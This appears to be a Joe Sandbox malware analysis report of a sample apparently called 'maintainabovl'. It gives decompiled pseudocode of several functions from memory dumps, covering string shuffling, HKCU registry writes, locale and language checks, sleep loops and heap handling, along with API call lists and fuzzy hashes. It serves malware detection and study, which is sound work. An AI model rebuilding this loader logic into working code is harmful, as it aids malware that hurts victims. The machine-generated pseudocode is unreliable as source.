Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: 847274582f8964afd5ee92a5191dbdf3b56bd8f70615b6f98c00c277a2efc661
Instruction ID: 1a5d882b6dc3ffe01724be00b0c15ad942636833b60c9522095c85bd1cf5ce38
Opcode Fuzzy Hash: 847274582f8964afd5ee92a5191dbdf3b56bd8f70615b6f98c00c277a2efc661
Instruction Fuzzy Hash: E4F0DA70300251DFEF309B69DD68B1A3BF4BB58344B048444B9D1D7269C666D851EB55

Uniqueness

Uniqueness Score: -1.00%

Function 01091C88 Relevance: 7.7, APIs: 5, Instructions: 161
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E01091C88(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				CHAR* _t37;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t52;
				signed char _t57;
				intOrPtr _t59;
				signed int _t60;
				void* _t64;
				CHAR* _t68;
				CHAR* _t69;
				char* _t70;
				void* _t71;

				_t62 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E01095D37();
				if(_t21 != 0) {
					_t60 =  *0x109a2fc; // 0x2000000a
					_t56 = (_t60 & 0xf0000000) + _t21;
					 *0x109a2fc = (_t60 & 0xf0000000) + _t21;
				}
				_t22 =  *0x109a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E010929E6( &_v8,  &_v20); // executed
					_t55 = _t25;
					_t26 =  *0x109a348; // 0xa6d5a8
					if( *0x109a2fc > 5) {
						_t8 = _t26 + 0x109b5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x109b9ef; // 0x44283a44
						_t27 = _t7;
					}
					E01096234(_t27, _t27);
					_t31 = E010974C4(_t62,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t64 = 5;
					if(_t55 != _t64) {
						_t32 = E01093BEF();
						 *0x109a310 =  *0x109a310 ^ 0x81bbe65d;
						 *0x109a36c = _t32;
						_t33 = E01096A51(0x60);
						 *0x109a3cc = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t33, 0, 0x60);
							_t50 =  *0x109a3cc; // 0x1b09600
							_t71 = _t71 + 0xc;
							__imp__(_t50 + 0x40);
							_t52 =  *0x109a3cc; // 0x1b09600
							 *_t52 = 0x109b827;
						}
						_t55 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t37 = RtlAllocateHeap( *0x109a2d8, 0, 0x43);
							 *0x109a368 = _t37;
							__eflags = _t37;
							if(_t37 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t57 =  *0x109a2fc; // 0x2000000a
								_t62 = _t57 & 0x000000ff;
								_t59 =  *0x109a348; // 0xa6d5a8
								_t13 = _t59 + 0x109b552; // 0x697a6f4d
								_t56 = _t13;
								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x109927b);
							}
							_t55 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E01095710( ~_v8 &  *0x109a310, 0x109a00c); // executed
								_t43 = E01097596(0, _t56, _t62, _t64, 0x109a00c); // executed
								_t55 = _t43;
								__eflags = _t55;
								if(_t55 != 0) {
									goto L30;
								}
								_t44 = E01091603(_t62); // executed
								__eflags = _t44;
								if(_t44 != 0) {
									__eflags = _v8;
									_t68 = _v12;
									if(_v8 != 0) {
										L29:
										_t45 = E010948D3(_t62, _t68, _v8); // executed
										_t55 = _t45;
										goto L30;
									}
									__eflags = _t68;
									if(__eflags == 0) {
										goto L30;
									}
									_t55 = E010934AD(__eflags,  &(_t68[4]));
									__eflags = _t55;
									if(_t55 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t55 = 8;
							}
						}
					} else {
						_t69 = _v12;
						if(_t69 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x109a17c();
							}
							goto L34;
						}
						_t70 =  &(_t69[4]);
						do {
						} while (E01095F7C(_t64, _t70, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t55 = _t22;
					L34:
					return _t55;
				}
			}

0x01091c88
0x01091c92
0x01091c95
0x01091c98
0x01091c9b
0x01091ca2
0x01091ca4
0x01091cb0
0x01091cb2
0x01091cb2
0x01091cbb
0x01091cc1
0x01091cc6
0x01091ce0
0x01091cec
0x01091cee
0x01091cf3
0x01091cfd
0x01091cfd
0x01091cf5
0x01091cf5
0x01091cf5
0x01091cf5
0x01091d04
0x01091d11
0x01091d18
0x01091d1d
0x01091d1d
0x01091d26
0x01091d29
0x01091d4f
0x01091d54
0x01091d60
0x01091d65
0x01091d6a
0x01091d6f
0x01091d71
0x01091d9d
0x01091d9f
0x01091d73
0x01091d77
0x01091d7c
0x01091d81
0x01091d88
0x01091d8e
0x01091d93
0x01091d99
0x01091da0
0x01091da2
0x01091da4
0x01091db3
0x01091db9
0x01091dbe
0x01091dc0
0x01091df0
0x01091df2
0x01091dc2
0x01091dc2
0x01091dc8
0x01091dd5
0x01091ddb
0x01091ddb
0x01091de3
0x01091dec
0x01091df3
0x01091df5
0x01091df7
0x01091dfe
0x01091e0b
0x01091e10
0x01091e15
0x01091e17
0x01091e19
0x00000000
0x00000000
0x01091e1b
0x01091e20
0x01091e22
0x01091e29
0x01091e2d
0x01091e30
0x01091e45
0x01091e49
0x01091e4e
0x00000000
0x01091e4e
0x01091e32
0x01091e34
0x00000000
0x00000000
0x01091e3f
0x01091e41
0x01091e43
0x00000000
0x00000000
0x00000000
0x01091e43
0x01091e26
0x01091e26
0x01091df7
0x01091d2b
0x01091d2b
0x01091d30
0x01091e50
0x01091e55
0x01091e5d
0x01091e5d
0x00000000
0x01091e55
0x01091d36
0x01091d39
0x01091d43
0x01091d4a
0x00000000
0x01091e65
0x01091e65
0x01091e68
0x01091e6c
0x01091e6c

APIs

Part of subcall function 01095D37: GetModuleHandleA.KERNEL32(4C44544E,00000000,01091CA0,00000001), ref: 01095D46

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01091D1D

Part of subcall function 01093BEF: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 01093C13
Part of subcall function 01093BEF: wsprintfA.USER32 ref: 01093C77

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

memset.NTDLL ref: 01091D77
RtlInitializeCriticalSection.NTDLL(01B095C0), ref: 01091D88

Part of subcall function 010934AD: memset.NTDLL ref: 010934C7
Part of subcall function 010934AD: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 0109350D
Part of subcall function 010934AD: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01093518

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01091DB3
wsprintfA.USER32 ref: 01091DE3

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: 4f6ee680d363ce02e7289b62975aabbb2611ae4c26cac7c17ee255b17e76a40d
Instruction ID: 5c81b1203a37da65ee925dd217742a7fe5157dedde9ce037dcfa51113a9cd6e0
Opcode Fuzzy Hash: 4f6ee680d363ce02e7289b62975aabbb2611ae4c26cac7c17ee255b17e76a40d
Instruction Fuzzy Hash: F2511771B01216EFDF61ABA8DC74FAE37E8BB08B64F0044A5F5C1E7144D7769940AB50

Uniqueness

Uniqueness Score: -1.00%

Function 0109256D Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0109256D(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E01096A51(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E0109692B(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E01096A51((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x109a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x01092574
0x0109257b
0x01092580
0x01092583
0x0109258a
0x0109258d
0x01092590
0x01092595
0x0109259a
0x010926ee
0x010926f0
0x010926f2
0x010926f7
0x010926f7
0x010925a0
0x010925a3
0x010925a6
0x010925a8
0x010925a8
0x010925ac
0x00000000
0x00000000
0x010925b0
0x010925dc
0x010925e1
0x010925e3
0x010925e3
0x010925e6
0x010925e9
0x010925e9
0x010925eb
0x00000000
0x010925b6
0x010925b8
0x010925d7
0x010925d7
0x010925ee
0x010925ee
0x010925ef
0x010925ef
0x010925f2
0x00000000
0x00000000
0x00000000
0x010925f2
0x010925bc
0x01092603
0x01092607
0x010926e1
0x010926e3
0x010926e3
0x010926e4
0x010926e7
0x00000000
0x010926e7
0x01092610
0x01092621
0x01092625
0x010926dd
0x00000000
0x010926dd
0x0109262b
0x0109262e
0x01092632
0x01092636
0x0109263b
0x010926d3
0x010926d3
0x00000000
0x010926d9
0x01092646
0x0109264f
0x01092663
0x0109266a
0x0109267f
0x01092685
0x0109268d
0x00000000
0x00000000
0x00000000
0x00000000
0x0109268f
0x0109268f
0x0109268f
0x01092696
0x0109269e
0x00000000
0x00000000
0x010926a0
0x010926a9
0x00000000
0x00000000
0x00000000
0x010926ab
0x010926ad
0x010926b0
0x010926b0
0x010926b3
0x010926b7
0x010926ba
0x010926c0
0x010926c3
0x010926ca
0x00000000
0x01092646
0x010925c1
0x010925c9
0x010925cf
0x010925d1
0x010925d1
0x010925d4
0x010925d6
0x00000000
0x010925d6
0x010925b0
0x010925f6
0x010925fb
0x010925fd
0x010925fd
0x01092600
0x01092600
0x00000000

APIs

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

lstrcpy.KERNEL32(69B25F45,00000020), ref: 0109266A
lstrcat.KERNEL32(69B25F45,00000020), ref: 0109267F
lstrcmp.KERNEL32(00000000,69B25F45), ref: 01092696
lstrlen.KERNEL32(69B25F45), ref: 010926BA

Strings

, xrefs: 01092603

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 26de16b6f27658f1aee9fc357cb06e570c1bd8282f5122db723b0babdb8285e6
Instruction ID: b8f88e06ce88333b0299898a2a189216a46e37d0997b58d6d06052a97729fa28
Opcode Fuzzy Hash: 26de16b6f27658f1aee9fc357cb06e570c1bd8282f5122db723b0babdb8285e6
Instruction Fuzzy Hash: CC51B131A00108FFDF21DF99C8A46EDBBF5FF49314F05809AE995AB241C771AA51EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00401829 Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x403160 = _t1;
				if(_t1 != 0) {
					 *0x403170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00401178(); // executed
					_t6 = _t4;
					HeapDestroy( *0x403160);
				}
				ExitProcess(_t6);
			}

0x0040182a
0x00401833
0x00401839
0x00401840
0x00401849
0x0040184e
0x00401854
0x0040185f
0x00401861
0x00401861
0x00401868

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401833
GetModuleHandleA.KERNEL32(00000000), ref: 00401843
GetCommandLineW.KERNEL32 ref: 0040184E

Part of subcall function 00401178: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004011AD
Part of subcall function 00401178: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 004011F4
Part of subcall function 00401178: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 0040121C
Part of subcall function 00401178: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401226
Part of subcall function 00401178: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401239
Part of subcall function 00401178: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401266
Part of subcall function 00401178: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401284

HeapDestroy.KERNEL32 ref: 00401861
ExitProcess.KERNEL32 ref: 00401868

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
String ID:
API String ID: 1863574965-0
Opcode ID: 64a48826a41c1596630c885b0238fc87710a69f0ec3cf485d9d59366367dae9c
Instruction ID: 46ce5939423956044b99e745de0fc61d882277726fdf66c6e89cd4a99d514704
Opcode Fuzzy Hash: 64a48826a41c1596630c885b0238fc87710a69f0ec3cf485d9d59366367dae9c
Instruction Fuzzy Hash: 2BE0B6714027209BC3112F71AF0CA5F3E28BB0E7567048536F605F62B1CB780A01CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 01095E69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01095E69(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0109181A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x109a348; // 0xa6d5a8
				_t4 = _t24 + 0x109be30; // 0x1b093d8
				_t5 = _t24 + 0x109bdd8; // 0x4f0053
				_t26 = E01096A66( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x109a348; // 0xa6d5a8
						_t11 = _t32 + 0x109be24; // 0x1b093cc
						_t48 = _t11;
						_t12 = _t32 + 0x109bdd8; // 0x4f0053
						_t52 = E01091E85(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x109a348; // 0xa6d5a8
							_t13 = _t35 + 0x109be6e; // 0x30314549
							_t37 = E0109136E(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x109a2fc - 6;
								if( *0x109a2fc <= 6) {
									_t42 =  *0x109a348; // 0xa6d5a8
									_t15 = _t42 + 0x109bdba; // 0x52384549
									E0109136E(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x109a348; // 0xa6d5a8
							_t17 = _t38 + 0x109be68; // 0x1b09410
							_t18 = _t38 + 0x109be40; // 0x680043
							_t45 = E010951C0(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x109a2d8, 0, _t52);
						}
					}
					HeapFree( *0x109a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E0109739F(_t54);
				}
				return _t45;
			}

0x01095e69
0x01095e79
0x01095e7c
0x01095e83
0x01095e85
0x01095e85
0x01095e88
0x01095e8d
0x01095e94
0x01095ea1
0x01095ea6
0x01095eaa
0x01095eb8
0x01095ec6
0x01095eca
0x01095f5b
0x01095f5b
0x01095ed0
0x01095ed0
0x01095ed5
0x01095ed5
0x01095edc
0x01095ee8
0x01095eea
0x01095eec
0x01095eee
0x01095ef5
0x01095f00
0x01095f07
0x01095f09
0x01095f10
0x01095f12
0x01095f19
0x01095f24
0x01095f24
0x01095f10
0x01095f29
0x01095f2e
0x01095f35
0x01095f53
0x01095f55
0x01095f55
0x01095eec
0x01095f67
0x01095f67
0x01095f69
0x01095f6e
0x01095f70
0x01095f70
0x01095f7b

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01B093D8,00000000,?,7476F710,00000000,7476F730), ref: 01095EB8
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01B09410,?,00000000,30314549,00000014,004F0053,01B093CC), ref: 01095F55
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01094974), ref: 01095F67

Strings

Uqt, xrefs: 01095EBE

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: db5e330acf881293e12a75c13e5574e4eb1378da1ccd265a7a8ae7b67cafaac2
Instruction ID: e2be96719ba0bbb3157a9be28a543a39dc3b17d348292943ab7721aca378a431
Opcode Fuzzy Hash: db5e330acf881293e12a75c13e5574e4eb1378da1ccd265a7a8ae7b67cafaac2
Instruction Fuzzy Hash: 5A31A432600219FFDF22DF95DDA4EDE7BFCEB48720F0441A6B68497060D6729A48EB50

Uniqueness

Uniqueness Score: -1.00%

Function 010950B7 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 01095114
SysAllocString.OLEAUT32(010920DA), ref: 01095158
SysFreeString.OLEAUT32(00000000), ref: 0109516C
SysFreeString.OLEAUT32(00000000), ref: 0109517A

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 89218a799f46c17b97d6e5d35f2fa5af7cc0fdc0e673d12c92397eed47e7bc26
Instruction ID: 60fd22f5f1757e8864107fa905da6b719ca1280ef42e961e5a65d061b3f1f589
Opcode Fuzzy Hash: 89218a799f46c17b97d6e5d35f2fa5af7cc0fdc0e673d12c92397eed47e7bc26
Instruction Fuzzy Hash: 55312AB2900209EFCF16CF99D8E08EE7BB9FF48350B10852EFA4697250D7759981CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010928A7 Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E010928A7(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L01098376();
					_t34 = _t16 + _t13;
					_t17 = E01092F78(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x010928ac
0x010928b7
0x010928b8
0x010928b8
0x010928c4
0x010928cd
0x010928d0
0x010928d4
0x010928d6
0x010928db
0x010928dc
0x010928dd
0x010928e7
0x010928ea
0x010928f1
0x010928f5
0x010928fc
0x01092902
0x0109290c

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,010910A6,?,?), ref: 010928B8
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,010910A6,?,?), ref: 010928C4
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 010928DD

Part of subcall function 01092F78: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 01093017

Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,010910A6,?,?), ref: 010928FC

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: e02b6488f5c5f2a5f6f6b07fd591dc1c324001b7755ecd7b73c080f465b98ca9
Instruction ID: b3758cd50361cbc6214fa5812d67b5b75b280e2ad419b8ea5db941694eafb391
Opcode Fuzzy Hash: e02b6488f5c5f2a5f6f6b07fd591dc1c324001b7755ecd7b73c080f465b98ca9
Instruction Fuzzy Hash: D4F0A477A402047BDB149BA4CC2EBDF76B9E7C5361F104128F611E7340E6B89A018790

Uniqueness

Uniqueness Score: -1.00%

Function 0109136E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0109136E(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E01094881(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E0109346E(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E010910C5(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x109a2d8, 0, _t25);
				}
				return _t22;
			}

0x0109136e
0x0109137f
0x01091383
0x010913de
0x01091385
0x0109138c
0x01091394
0x01091397
0x0109139c
0x010913a0
0x010913a6
0x010913ae
0x010913b1
0x010913c9
0x010913c9
0x010913d4
0x010913d4
0x010913e5

APIs

Part of subcall function 01094881: lstrlen.KERNEL32(?,00000000,01B09DD8,00000000,0109166A,01B09FFB,69B25F44,?,?,?,?,69B25F44,00000005,0109A00C,4D283A53,?), ref: 01094888
Part of subcall function 01094881: mbstowcs.NTDLL ref: 010948B1
Part of subcall function 01094881: memset.NTDLL ref: 010948C3

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,01B093CC), ref: 010913A6
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,01B093CC), ref: 010913D4

Strings

Uqt, xrefs: 010913D4

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uqt
API String ID: 1500278894-2320327147
